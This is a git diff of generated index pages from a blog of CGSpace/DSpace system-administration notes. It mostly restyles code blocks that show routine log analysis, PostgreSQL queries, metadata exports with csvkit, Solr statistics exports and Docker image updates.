                                                                                                                                                                                                                                                                                                                                                                                                    # awk '{print $1}' /var/log/nginx/rest.log  | uniq | wc -l
                                                                                                                                                                                                                                                                                                                                                                                                     3168
                                                                                                                                                                                                                                                                                                                                                                                                     
                                                                                                                                                                                                                                                                                                                                                                                                    Read more → @@ -350,7 +350,7 @@ dspacetest=# select text_value from metadatavalue where metadata_field_id=3 and
                                                                                                                                                                                                                                                                                                                                                                                                  • Looks like DSpace exhausted its PostgreSQL connection pool
                                                                                                                                                                                                                                                                                                                                                                                                  • Last week I had increased the limit from 30 to 60, which seemed to help, but now there are many more idle connections:
                                                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                                                  $ psql -c 'SELECT * from pg_stat_activity;' | grep idle | grep -c cgspace
                                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                                  $ psql -c 'SELECT * from pg_stat_activity;' | grep idle | grep -c cgspace
                                                                                                                                                                                                                                                                                                                                                                                                   78
                                                                                                                                                                                                                                                                                                                                                                                                   
                                                                                                                                                                                                                                                                                                                                                                                                  Read more → diff --git a/docs/posts/index.html b/docs/posts/index.html index 5bdda859d..247930431 100644 --- a/docs/posts/index.html +++ b/docs/posts/index.html @@ -10,14 +10,14 @@ - + - + @@ -109,11 +109,11 @@
                                                                                                                                                                                                                                                                                                                                                                                                  • Send Gaia the last batch of potential duplicates for items 701 to 980:
                                                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                                                  $ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv > /tmp/tac4.csv
                                                                                                                                                                                                                                                                                                                                                                                                  -$ ./ilri/check-duplicates.py -i /tmp/tac4.csv -db dspace -u dspace -p 'fuuu' -o /tmp/2022-03-01-tac-batch4-701-980.csv
                                                                                                                                                                                                                                                                                                                                                                                                  -$ csvcut -c id,filename ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv > /tmp/tac4-filenames.csv
                                                                                                                                                                                                                                                                                                                                                                                                  -$ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv > /tmp/2022-03-01-tac-batch4-701-980-filenames.csv
                                                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                                  $ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv > /tmp/tac4.csv
                                                                                                                                                                                                                                                                                                                                                                                                  +$ ./ilri/check-duplicates.py -i /tmp/tac4.csv -db dspace -u dspace -p 'fuuu' -o /tmp/2022-03-01-tac-batch4-701-980.csv
                                                                                                                                                                                                                                                                                                                                                                                                  +$ csvcut -c id,filename ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv > /tmp/tac4-filenames.csv
                                                                                                                                                                                                                                                                                                                                                                                                  +$ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv > /tmp/2022-03-01-tac-batch4-701-980-filenames.csv
                                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                                  Read more → @@ -185,13 +185,13 @@ $ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv &
                                                                                                                                                                                                                                                                                                                                                                                                • Atmire merged some changes I had submitted to the COUNTER-Robots project
                                                                                                                                                                                                                                                                                                                                                                                                • I updated our local spider user agents and then re-ran the list with my check-spider-hits.sh script on CGSpace:
                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                $ ./ilri/check-spider-hits.sh -f /tmp/agents -p  
                                                                                                                                                                                                                                                                                                                                                                                                -Purging 1989 hits from The Knowledge AI in statistics
                                                                                                                                                                                                                                                                                                                                                                                                -Purging 1235 hits from MaCoCu in statistics
                                                                                                                                                                                                                                                                                                                                                                                                -Purging 455 hits from WhatsApp in statistics
                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                -Total number of bot hits purged: 3679
                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                $ ./ilri/check-spider-hits.sh -f /tmp/agents -p  
                                                                                                                                                                                                                                                                                                                                                                                                +Purging 1989 hits from The Knowledge AI in statistics
                                                                                                                                                                                                                                                                                                                                                                                                +Purging 1235 hits from MaCoCu in statistics
                                                                                                                                                                                                                                                                                                                                                                                                +Purging 455 hits from WhatsApp in statistics
                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                +Total number of bot hits purged: 3679
                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                Read more → @@ -214,9 +214,9 @@ Purging 455 hits from WhatsApp in statistics
                                                                                                                                                                                                                                                                                                                                                                                              • I experimented with manually sharding the Solr statistics on DSpace Test
                                                                                                                                                                                                                                                                                                                                                                                              • First I exported all the 2019 stats from CGSpace:
                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                              $ ./run.sh -s http://localhost:8081/solr/statistics -f 'time:2019-*' -a export -o statistics-2019.json -k uid
                                                                                                                                                                                                                                                                                                                                                                                              -$ zstd statistics-2019.json
                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                              $ ./run.sh -s http://localhost:8081/solr/statistics -f 'time:2019-*' -a export -o statistics-2019.json -k uid
                                                                                                                                                                                                                                                                                                                                                                                              +$ zstd statistics-2019.json
                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                              Read more → @@ -238,15 +238,15 @@ $ zstd statistics-2019.json
                                                                                                                                                                                                                                                                                                                                                                                              • Export all affiliations on CGSpace and run them against the latest RoR data dump:
                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                              localhost/dspace63= > \COPY (SELECT DISTINCT text_value as "cg.contributor.affiliation", count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2021-10-01-affiliations.csv WITH CSV HEADER;
                                                                                                                                                                                                                                                                                                                                                                                              -$ csvcut -c 1 /tmp/2021-10-01-affiliations.csv | sed 1d > /tmp/2021-10-01-affiliations.txt
                                                                                                                                                                                                                                                                                                                                                                                              -$ ./ilri/ror-lookup.py -i /tmp/2021-10-01-affiliations.txt -r 2021-09-23-ror-data.json -o /tmp/2021-10-01-affili
                                                                                                                                                                                                                                                                                                                                                                                              -ations-matching.csv
                                                                                                                                                                                                                                                                                                                                                                                              -$ csvgrep -c matched -m true /tmp/2021-10-01-affiliations-matching.csv | sed 1d | wc -l 
                                                                                                                                                                                                                                                                                                                                                                                              -1879
                                                                                                                                                                                                                                                                                                                                                                                              -$ wc -l /tmp/2021-10-01-affiliations.txt 
                                                                                                                                                                                                                                                                                                                                                                                              -7100 /tmp/2021-10-01-affiliations.txt
                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                localhost/dspace63= > \COPY (SELECT DISTINCT text_value as "cg.contributor.affiliation", count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2021-10-01-affiliations.csv WITH CSV HEADER;
                                                                                                                                                                                                                                                                                                                                                                                                +$ csvcut -c 1 /tmp/2021-10-01-affiliations.csv | sed 1d > /tmp/2021-10-01-affiliations.txt
                                                                                                                                                                                                                                                                                                                                                                                                +$ ./ilri/ror-lookup.py -i /tmp/2021-10-01-affiliations.txt -r 2021-09-23-ror-data.json -o /tmp/2021-10-01-affili
                                                                                                                                                                                                                                                                                                                                                                                                +ations-matching.csv
                                                                                                                                                                                                                                                                                                                                                                                                +$ csvgrep -c matched -m true /tmp/2021-10-01-affiliations-matching.csv | sed 1d | wc -l 
                                                                                                                                                                                                                                                                                                                                                                                                +1879
                                                                                                                                                                                                                                                                                                                                                                                                +$ wc -l /tmp/2021-10-01-affiliations.txt 
                                                                                                                                                                                                                                                                                                                                                                                                +7100 /tmp/2021-10-01-affiliations.txt
                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                • So we have 1879/7100 (26.46%) matching already
                                                                                                                                                                                                                                                                                                                                                                                                Read more → @@ -303,8 +303,8 @@ $ wc -l /tmp/2021-10-01-affiliations.txt
                                                                                                                                                                                                                                                                                                                                                                                                • Update Docker images on AReS server (linode20) and reboot the server:
                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                # docker images | grep -v ^REPO | sed 's/ \+/:/g' | cut -d: -f1,2 | grep -v none | xargs -L1 docker pull
                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                                  # docker images | grep -v ^REPO | sed 's/ \+/:/g' | cut -d: -f1,2 | grep -v none | xargs -L1 docker pull
                                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                                  • I decided to upgrade linode20 from Ubuntu 18.04 to 20.04
                                                                                                                                                                                                                                                                                                                                                                                                  Read more → @@ -328,9 +328,9 @@ $ wc -l /tmp/2021-10-01-affiliations.txt
                                                                                                                                                                                                                                                                                                                                                                                                  • Export another list of ALL subjects on CGSpace, including AGROVOC and non-AGROVOC for Enrico:
                                                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                                                  localhost/dspace63= > \COPY (SELECT DISTINCT LOWER(text_value) AS subject, count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id IN (119, 120, 127, 122, 128, 125, 135, 203, 208, 210, 215, 123, 236, 242, 187) GROUP BY subject ORDER BY count DESC) to /tmp/2021-07-01-all-subjects.csv WITH CSV HEADER;
                                                                                                                                                                                                                                                                                                                                                                                                  -COPY 20994
                                                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                                  localhost/dspace63= > \COPY (SELECT DISTINCT LOWER(text_value) AS subject, count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id IN (119, 120, 127, 122, 128, 125, 135, 203, 208, 210, 215, 123, 236, 242, 187) GROUP BY subject ORDER BY count DESC) to /tmp/2021-07-01-all-subjects.csv WITH CSV HEADER;
                                                                                                                                                                                                                                                                                                                                                                                                  +COPY 20994
                                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                                  Read more → diff --git a/docs/posts/index.xml b/docs/posts/index.xml index b8238e4e8..06fbf986e 100644 --- a/docs/posts/index.xml +++ b/docs/posts/index.xml @@ -17,11 +17,11 @@ <ul> <li>Send Gaia the last batch of potential duplicates for items 701 to 980:</li> </ul> -<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv &gt; /tmp/tac4.csv -$ ./ilri/check-duplicates.py -i /tmp/tac4.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -o /tmp/2022-03-01-tac-batch4-701-980.csv -$ csvcut -c id,filename ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv &gt; /tmp/tac4-filenames.csv -$ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv &gt; /tmp/2022-03-01-tac-batch4-701-980-filenames.csv -</code></pre></div> +<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv &gt; /tmp/tac4.csv +</span></span><span style="display:flex;"><span>$ ./ilri/check-duplicates.py -i /tmp/tac4.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -o /tmp/2022-03-01-tac-batch4-701-980.csv +</span></span><span style="display:flex;"><span>$ csvcut -c id,filename ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv &gt; /tmp/tac4-filenames.csv +</span></span><span style="display:flex;"><span>$ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv &gt; /tmp/2022-03-01-tac-batch4-701-980-filenames.csv +</span></span></code></pre></div> @@ -66,13 +66,13 @@ $ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv & <li>Atmire merged some changes I had submitted to the COUNTER-Robots project</li> <li>I updated our local spider user agents and then re-ran the list with my <code>check-spider-hits.sh</code> script on CGSpace:</li> </ul> -<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ ./ilri/check-spider-hits.sh -f /tmp/agents -p -Purging 1989 hits from The Knowledge AI in statistics -Purging 1235 hits from MaCoCu in statistics -Purging 455 hits from WhatsApp in statistics -<span style="color:#960050;background-color:#1e0010"> -</span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 3679 -</code></pre></div> +<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/check-spider-hits.sh -f /tmp/agents -p +</span></span><span style="display:flex;"><span>Purging 1989 hits from The Knowledge AI in statistics +</span></span><span style="display:flex;"><span>Purging 1235 hits from MaCoCu in statistics +</span></span><span style="display:flex;"><span>Purging 455 hits from WhatsApp in statistics +</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"> +</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 3679 +</span></span></code></pre></div> @@ -86,9 +86,9 @@ Purging 455 hits from WhatsApp in statistics <li>I experimented with manually sharding the Solr statistics on DSpace Test</li> <li>First I exported all the 2019 stats from CGSpace:</li> </ul> -<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ ./run.sh -s http://localhost:8081/solr/statistics -f <span style="color:#e6db74">&#39;time:2019-*&#39;</span> -a export -o statistics-2019.json -k uid -$ zstd statistics-2019.json -</code></pre></div> +<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./run.sh -s http://localhost:8081/solr/statistics -f <span style="color:#e6db74">&#39;time:2019-*&#39;</span> -a export -o statistics-2019.json -k uid +</span></span><span style="display:flex;"><span>$ zstd statistics-2019.json +</span></span></code></pre></div> @@ -101,15 +101,15 @@ $ zstd statistics-2019.json <ul> <li>Export all affiliations on CGSpace and run them against the latest RoR data dump:</li> </ul> -<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">localhost/dspace63= &gt; \COPY (SELECT DISTINCT text_value as &#34;cg.contributor.affiliation&#34;, count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2021-10-01-affiliations.csv WITH CSV HEADER; -$ csvcut -c <span style="color:#ae81ff">1</span> /tmp/2021-10-01-affiliations.csv | sed 1d &gt; /tmp/2021-10-01-affiliations.txt -$ ./ilri/ror-lookup.py -i /tmp/2021-10-01-affiliations.txt -r 2021-09-23-ror-data.json -o /tmp/2021-10-01-affili -ations-matching.csv -$ csvgrep -c matched -m true /tmp/2021-10-01-affiliations-matching.csv | sed 1d | wc -l -1879 -$ wc -l /tmp/2021-10-01-affiliations.txt -7100 /tmp/2021-10-01-affiliations.txt -</code></pre></div><ul> +<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspace63= &gt; \COPY (SELECT DISTINCT text_value as &#34;cg.contributor.affiliation&#34;, count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2021-10-01-affiliations.csv WITH CSV HEADER; +</span></span><span style="display:flex;"><span>$ csvcut -c <span style="color:#ae81ff">1</span> /tmp/2021-10-01-affiliations.csv | sed 1d &gt; /tmp/2021-10-01-affiliations.txt +</span></span><span style="display:flex;"><span>$ ./ilri/ror-lookup.py -i /tmp/2021-10-01-affiliations.txt -r 2021-09-23-ror-data.json -o /tmp/2021-10-01-affili +</span></span><span style="display:flex;"><span>ations-matching.csv +</span></span><span style="display:flex;"><span>$ csvgrep -c matched -m true /tmp/2021-10-01-affiliations-matching.csv | sed 1d | wc -l +</span></span><span style="display:flex;"><span>1879 +</span></span><span style="display:flex;"><span>$ wc -l /tmp/2021-10-01-affiliations.txt +</span></span><span style="display:flex;"><span>7100 /tmp/2021-10-01-affiliations.txt +</span></span></code></pre></div><ul> <li>So we have 1879/7100 (26.46%) matching already</li> </ul> @@ -148,8 +148,8 @@ $ wc -l /tmp/2021-10-01-affiliations.txt <ul> <li>Update Docker images on AReS server (linode20) and reboot the server:</li> </ul> -<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console"># docker images | grep -v ^REPO | sed <span style="color:#e6db74">&#39;s/ \+/:/g&#39;</span> | cut -d: -f1,2 | grep -v none | xargs -L1 docker pull -</code></pre></div><ul> +<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># docker images | grep -v ^REPO | sed <span style="color:#e6db74">&#39;s/ \+/:/g&#39;</span> | cut -d: -f1,2 | grep -v none | xargs -L1 docker pull +</span></span></code></pre></div><ul> <li>I decided to upgrade linode20 from Ubuntu 18.04 to 20.04</li> </ul> @@ -164,9 +164,9 @@ $ wc -l /tmp/2021-10-01-affiliations.txt <ul> <li>Export another list of ALL subjects on CGSpace, including AGROVOC and non-AGROVOC for Enrico:</li> </ul> -<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">localhost/dspace63= &gt; \COPY (SELECT DISTINCT LOWER(text_value) AS subject, count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id IN (119, 120, 127, 122, 128, 125, 135, 203, 208, 210, 215, 123, 236, 242, 187) GROUP BY subject ORDER BY count DESC) to /tmp/2021-07-01-all-subjects.csv WITH CSV HEADER; -COPY 20994 -</code></pre></div> +<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspace63= &gt; \COPY (SELECT DISTINCT LOWER(text_value) AS subject, count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id IN (119, 120, 127, 122, 128, 125, 135, 203, 208, 210, 215, 123, 236, 242, 187) GROUP BY subject ORDER BY count DESC) to /tmp/2021-07-01-all-subjects.csv WITH CSV HEADER; +</span></span><span style="display:flex;"><span>COPY 20994 +</span></span></code></pre></div> @@ -271,17 +271,17 @@ COPY 20994 <li>I had a call with CodeObia to discuss the work on OpenRXV</li> <li>Check the results of the AReS harvesting from last night:</li> </ul> -<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp/_count?q=*&amp;pretty&#39;</span> -{ - &#34;count&#34; : 100875, - &#34;_shards&#34; : { - &#34;total&#34; : 1, - &#34;successful&#34; : 1, - &#34;skipped&#34; : 0, - &#34;failed&#34; : 0 - } -} -</code></pre></div> +<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp/_count?q=*&amp;pretty&#39;</span> +</span></span><span style="display:flex;"><span>{ +</span></span><span style="display:flex;"><span> &#34;count&#34; : 100875, +</span></span><span style="display:flex;"><span> &#34;_shards&#34; : { +</span></span><span style="display:flex;"><span> &#34;total&#34; : 1, +</span></span><span style="display:flex;"><span> &#34;successful&#34; : 1, +</span></span><span style="display:flex;"><span> &#34;skipped&#34; : 0, +</span></span><span style="display:flex;"><span> &#34;failed&#34; : 0 +</span></span><span style="display:flex;"><span> } +</span></span><span style="display:flex;"><span>} +</span></span></code></pre></div> @@ -599,17 +599,17 @@ COPY 20994 </ul> </li> </ul> -<pre tabindex="0"><code># zcat --force /var/log/nginx/*access.log.*.gz | grep -cE &quot;[0-9]{1,2}/Oct/2019&quot; +<pre tabindex="0"><code># zcat --force /var/log/nginx/*access.log.*.gz | grep -cE &#34;[0-9]{1,2}/Oct/2019&#34; 4671942 -# zcat --force /var/log/nginx/{rest,oai,statistics}.log.*.gz | grep -cE &quot;[0-9]{1,2}/Oct/2019&quot; +# zcat --force /var/log/nginx/{rest,oai,statistics}.log.*.gz | grep -cE &#34;[0-9]{1,2}/Oct/2019&#34; 1277694 </code></pre><ul> <li>So 4.6 million from XMLUI and another 1.2 million from API requests</li> <li>Let&rsquo;s see how many of the REST API requests were for bitstreams (because they are counted in Solr stats):</li> </ul> -<pre tabindex="0"><code># zcat --force /var/log/nginx/rest.log.*.gz | grep -c -E &quot;[0-9]{1,2}/Oct/2019&quot; +<pre tabindex="0"><code># zcat --force /var/log/nginx/rest.log.*.gz | grep -c -E &#34;[0-9]{1,2}/Oct/2019&#34; 1183456 -# zcat --force /var/log/nginx/rest.log.*.gz | grep -E &quot;[0-9]{1,2}/Oct/2019&quot; | grep -c -E &quot;/rest/bitstreams&quot; +# zcat --force /var/log/nginx/rest.log.*.gz | grep -E &#34;[0-9]{1,2}/Oct/2019&#34; | grep -c -E &#34;/rest/bitstreams&#34; 106781 </code></pre> @@ -620,7 +620,7 @@ COPY 20994 Tue, 01 Oct 2019 13:20:51 +0300 https://alanorth.github.io/cgspace-notes/2019-10/ - 2019-10-01 Udana from IWMI asked me for a CSV export of their community on CGSpace I exported it, but a quick run through the csv-metadata-quality tool shows that there are some low-hanging fruits we can fix before I send him the data I will limit the scope to the titles, regions, subregions, and river basins for now to manually fix some non-breaking spaces (U+00A0) there that would otherwise be removed by the csv-metadata-quality script&rsquo;s &ldquo;unneccesary Unicode&rdquo; fix: $ csvcut -c 'id,dc. + 2019-10-01 Udana from IWMI asked me for a CSV export of their community on CGSpace I exported it, but a quick run through the csv-metadata-quality tool shows that there are some low-hanging fruits we can fix before I send him the data I will limit the scope to the titles, regions, subregions, and river basins for now to manually fix some non-breaking spaces (U+00A0) there that would otherwise be removed by the csv-metadata-quality script&rsquo;s &ldquo;unneccesary Unicode&rdquo; fix: $ csvcut -c &#39;id,dc. @@ -634,7 +634,7 @@ COPY 20994 <li>Linode emailed to say that CGSpace (linode18) had a high rate of outbound traffic for several hours this morning</li> <li>Here are the top ten IPs in the nginx XMLUI and REST/OAI logs this morning:</li> </ul> -<pre tabindex="0"><code># zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &quot;01/Sep/2019:0&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10 +<pre tabindex="0"><code># zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &#34;01/Sep/2019:0&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10 440 17.58.101.255 441 157.55.39.101 485 207.46.13.43 @@ -645,7 +645,7 @@ COPY 20994 814 207.46.13.212 2472 163.172.71.23 6092 3.94.211.189 -# zcat --force /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E &quot;01/Sep/2019:0&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10 +# zcat --force /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E &#34;01/Sep/2019:0&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10 33 2a01:7e00::f03c:91ff:fe16:fcb 57 3.83.192.124 57 3.87.77.25 @@ -761,16 +761,16 @@ DELETE 1 </ul> </li> </ul> -<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep 'Spore-192-EN-web.pdf' | grep -E '(18.196.196.108|18.195.78.144|18.195.218.6)' | awk '{print $9}' | sort | uniq -c | sort -n | tail -n 5 +<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep &#39;Spore-192-EN-web.pdf&#39; | grep -E &#39;(18.196.196.108|18.195.78.144|18.195.218.6)&#39; | awk &#39;{print $9}&#39; | sort | uniq -c | sort -n | tail -n 5 4432 200 </code></pre><ul> <li>In the last two weeks there have been 47,000 downloads of this <em>same exact PDF</em> by these three IP addresses</li> <li>Apply country and region corrections and deletions on DSpace Test and CGSpace:</li> </ul> -<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-9-countries.csv -db dspace -u dspace -p 'fuuu' -f cg.coverage.country -m 228 -t ACTION -d -$ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-4-regions.csv -db dspace -u dspace -p 'fuuu' -f cg.coverage.region -m 231 -t action -d -$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-2-countries.csv -db dspace -u dspace -p 'fuuu' -m 228 -f cg.coverage.country -d -$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace -u dspace -p 'fuuu' -m 231 -f cg.coverage.region -d +<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-9-countries.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.coverage.country -m 228 -t ACTION -d +$ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-4-regions.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.coverage.region -m 231 -t action -d +$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-2-countries.csv -db dspace -u dspace -p &#39;fuuu&#39; -m 228 -f cg.coverage.country -d +$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace -u dspace -p &#39;fuuu&#39; -m 231 -f cg.coverage.region -d </code></pre> @@ -808,7 +808,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace <li>Linode has alerted a few times since last night that the CPU usage on CGSpace (linode18) was high despite me increasing the alert threshold last week from 250% to 275%—I might need to increase it again!</li> <li>The top IPs before, during, and after this latest alert tonight were:</li> </ul> -<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;01/Feb/2019:(17|18|19|20|21)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10 +<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;01/Feb/2019:(17|18|19|20|21)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10 245 207.46.13.5 332 54.70.40.11 385 5.143.231.38 @@ -824,7 +824,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace <li>The Solr statistics the past few months have been very high and I was wondering if the web server logs also showed an increase</li> <li>There were just over 3 million accesses in the nginx logs last month:</li> </ul> -<pre tabindex="0"><code># time zcat --force /var/log/nginx/* | grep -cE &quot;[0-9]{1,2}/Jan/2019&quot; +<pre tabindex="0"><code># time zcat --force /var/log/nginx/* | grep -cE &#34;[0-9]{1,2}/Jan/2019&#34; 3018243 real 0m19.873s @@ -844,7 +844,7 @@ sys 0m1.979s <li>Linode alerted that CGSpace (linode18) had a higher outbound traffic rate than normal early this morning</li> <li>I don&rsquo;t see anything interesting in the web server logs around that time though:</li> </ul> -<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;02/Jan/2019:0(1|2|3)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10 +<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;02/Jan/2019:0(1|2|3)&#34; 